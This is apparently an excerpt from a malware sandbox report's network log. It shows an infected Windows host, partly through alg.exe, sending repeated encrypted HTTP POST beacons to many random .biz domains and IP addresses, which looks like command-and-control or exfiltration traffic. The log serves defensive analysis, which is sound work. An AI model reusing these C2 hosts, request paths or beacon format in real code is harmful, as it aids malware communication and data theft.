                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        72192.168.2.105005118.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.911279917 CET353OUTPOST /vuubmwkijd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.911292076 CET834OUTData Raw: 29 93 72 71 ce 20 9b c5 36 03 00 00 86 51 1f 4f e5 87 0d 91 06 9e ec 88 d6 50 10 56 d0 2d c5 3f 00 c6 3f a5 d4 5a 74 9e 63 f4 d6 d9 86 88 b1 91 9a 45 49 58 ca cd 64 81 7d e4 f9 c9 37 72 29 ac 50 f9 e3 ed e3 e2 37 e0 49 45 b2 33 55 6c d9 41 8a 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )rq 6QOPV-??ZtcEIXd}7r)P7IE3UlA,V"6`dUYg<-_<S_~xV)=|z+Jd^-XR+wNX|<dPA/I/Mq(:P:g"J,X.f?GN%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.379692078 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dbeff27eb7f9f912f54e047181f45a0d|155.94.241.187|1731920341|1731920341|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        73192.168.2.105005234.211.97.45807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.272531033 CET351OUTPOST /bbriddytwq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.272566080 CET778OUTData Raw: 65 e5 72 92 0c 80 29 12 fe 02 00 00 06 99 42 8b 95 5d 9c fb ad 9b 82 b9 e6 37 87 e0 88 13 7d c9 97 69 97 a6 16 1d ef 4d 1d 16 93 68 2d 8a 75 07 53 d3 e6 09 0c 6f d8 f4 34 12 9b 92 9d f8 32 8a 59 fc b9 15 6d c1 65 ed 4e e7 ec b8 4b 46 96 7d 2e 31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: er)B]7}iMh-uSo42YmeNKF}.1FU;BH2Zg\Vpww|W@W|NMu$+x&<1vmrkq#{&WIT4BXs]V}>gQ~>gic+{Yztb]L]`
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.110693932 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7a7213a1b199deb3c6a7a51963daf4fc|155.94.241.187|1731920341|1731920341|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        74192.168.2.1050053172.234.222.13880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.401707888 CET354OUTPOST /yeeqryklqchag HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.401746988 CET834OUTData Raw: 4c 84 54 6b c3 4f 9f c5 36 03 00 00 19 6f dd 62 24 be c9 f4 f8 20 8f 21 5f ff f5 58 3c 66 0a a2 19 71 5b 7b 82 9b ff de e8 c0 74 ef 2e 05 ca 30 db 23 0a d1 fd a8 2e 73 3a 70 8d 04 eb 21 89 92 1d 0b e8 04 f9 e2 d8 79 05 52 4b 59 6f c5 2c aa 47 47
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: LTkO6ob$ !_X<fq[{t.0#.s:p!yRKYo,GG>.)ur2x|j`\TR'Zh/*`VT6&(^gO[c0Yl-B(Emla`bymG"@<_kpdCjH(*>


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        75192.168.2.1050054172.234.222.13880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.076596022 CET356OUTPOST /svctwhlwhnodkjc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.076596022 CET834OUTData Raw: de 15 c7 9e 85 fa ce ac 36 03 00 00 64 68 9f 9d 43 b3 20 d3 87 d4 ec 86 8f 5b 1a 0c 6a 5d b9 e0 4b 87 d5 32 f0 25 e7 16 47 56 b7 38 81 17 e0 88 b1 f1 91 b9 92 f5 3b da ce 4b 3e 41 09 85 e6 72 c8 19 7f d6 03 63 91 fd c5 f3 fc 45 ea 07 c4 c9 01 b5
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6dhC [j]K2%GV8;K>ArcE=5F:7<1),D@nyg~)hcA<Q%RjQ8S99'~g]&faX?4r{T6>9eEy9kzS8F^P+Ukhv


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        76192.168.2.105005547.129.31.212807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.392772913 CET354OUTPOST /srarrsentbxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.392791033 CET778OUTData Raw: 59 89 de a3 bd 23 06 8b fe 02 00 00 23 b4 0f 28 ce 9a 34 c8 42 6a df 3c 8b ac 15 f1 ff 9f 19 e0 8a ef 6b 82 43 f8 76 cd 16 ed c5 e9 dc 7e 55 5b ed 36 62 34 d2 fd 00 d6 c3 08 99 78 cf 4b bf 30 4e b2 5c e4 8c 00 53 fe ec ec 9b 26 3a cf 73 c5 7c dc
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Y##(4Bj<kCv~U[6b4xK0N\S&:s|{><7(Z\[| 3mz_Sn_9Sgm=4?& DbezAz0.Esk_awEVN><^9!wEu/Y)?VIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.860630035 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2e70a01800db4b10a1c2eff11955825b|155.94.241.187|1731920343|1731920343|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        77192.168.2.105005634.246.200.16080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.769539118 CET345OUTPOST /yaj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.769539118 CET834OUTData Raw: a2 71 f5 c7 a6 b9 5c 0e 36 03 00 00 1a 99 38 8a b5 ab 52 dd 9b ca 3a 70 58 65 0f 65 0c 65 4d 35 e2 25 88 56 2c ac c9 03 43 25 8f 48 b8 2c 26 58 40 ab b2 b5 e8 8f 97 4f 15 ac fb 0b 36 0c fa 24 9a 86 dd d8 da b4 a2 51 f5 09 8a b7 98 d4 67 d3 9a 76
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: q\68R:pXeeeM5%V,C%H,&X@O6$QgvpUc4NqwA4&4h~J4gU]WMC9-%g]]ijr"f7/}>D z#4L7f}=TFgAY$x#9Mi,HR
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.732074976 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=bdfbd1b77eb9541493a380400a844b06|155.94.241.187|1731920343|1731920343|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        78192.168.2.105005718.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.135345936 CET350OUTPOST /ubnpo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.135529041 CET778OUTData Raw: a5 5b 69 9b 23 a3 8b 8b fe 02 00 00 34 0d e9 b1 48 65 eb 8b 60 16 2c ab 27 53 0c e8 95 68 38 23 83 8e b8 48 7f 21 d0 fa cf 57 5c c2 43 9c 23 31 0f 99 20 f2 cd 3e 79 26 84 ed ad 12 ab a9 cf 8e 98 3d 32 49 1e 4d c9 e2 00 84 26 4f 28 c6 1f db af 92
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [i#4He`,'Sh8#H!W\C#1 >y&=2IM&O(>F3=$S 'i{R3Z[okFmpAv`~~e9]sb)4G*+n,6h>jWbbw/\<(/LB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.826997042 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ea1417230fbd160ddb957ff51ab9a89c|155.94.241.187|1731920344|1731920344|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        79192.168.2.105005818.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.527333975 CET346OUTPOST /dddgg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.527333975 CET834OUTData Raw: 29 a6 d3 0b 18 06 69 6e 36 03 00 00 53 1f 15 32 78 ce 6d 8e a7 1c 4a f8 65 40 af 18 f6 14 1f 73 34 ba 48 ec 1c c9 97 00 21 56 03 a3 7d 2a e8 2a d6 6c 85 16 52 78 63 48 5c e9 7b 4e b2 d0 13 3e 56 41 70 0e 3b be c3 4a 46 3a 75 c1 72 d3 9a b4 48 be
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )in6S2xmJe@s4H!V}**lRxcH\{N>VAp;JF:urHKCPy}zjgcv1)yAJe`rulY@zZeD?OB8I)r MVw[{Jf(5 *?srj_r71l*Wa
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.179490089 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dc332423ab46bb20357637da9a10aa57|155.94.241.187|1731920345|1731920345|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        80192.168.2.1050059208.100.26.24580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.201328993 CET356OUTPOST /ndwuuvykmbmq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.201349020 CET834OUTData Raw: bb 37 47 3d da b0 98 56 36 03 00 00 80 88 6d 69 62 ce 76 91 31 ec cf 6b 0d 39 fe 18 3e df 9c b2 b2 46 09 87 66 17 ed 82 56 c9 18 83 1b 52 c4 65 5a e8 5c 2d 8b c1 9f 36 7e d4 91 13 7a 3c 48 00 fc b9 09 4f 58 45 a8 d1 57 3e eb 21 d5 38 7c 29 e5 e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7G=V6mibv1k9>FfVReZ\-6~z<HOXEW>!8|)CTvu.l9J<UuuR/"!39D_:-5(PP;8#4eQLS~!9FkbcRs5[W/\|<(KP"95DR^$^YK8b4K~%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.836673975 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.842828035 CET354OUTPOST /xfffiesfse HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.842861891 CET834OUTData Raw: 19 02 37 7b f3 ef 3f 31 36 03 00 00 34 35 89 02 69 26 06 cc 96 0d 93 64 4a ec 7c 2a c8 c9 02 d0 f5 66 4a 16 0c 01 f6 c4 86 5c 29 0a 1a f6 f3 fa 8b be a9 da 6e e6 f8 71 c9 e7 1d 3a 7c 4a 2e 80 45 f7 fe ac 55 bc 44 03 e3 1e de f4 41 45 61 f5 41 a3
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7{?1645i&dJ|*fJ\)nq:|J.EUDAEaAD!3N54wF&X(/n!]%d(<gA=h0nBb=mfb7f(<CLRe4)|wgp;y)~ys{=YL|y-K|-c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.988284111 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
